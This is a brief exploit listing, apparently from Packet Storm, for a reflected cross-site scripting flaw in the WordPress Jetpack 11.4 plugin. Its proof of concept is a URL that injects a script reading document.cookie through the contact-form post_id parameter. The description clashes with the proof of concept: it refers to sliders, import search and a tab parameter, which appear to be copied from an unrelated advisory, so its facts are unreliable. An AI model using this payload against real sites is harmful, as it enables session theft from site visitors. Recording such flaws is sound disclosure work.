WordPress Jetpack plugin version 11.4 suffers from a cross site scripting vulnerability.
3ceaf797647de4108f92a76d5b936b7c111f3523b7c04d5ea66e199a17b6c652# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A
1. Description:
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed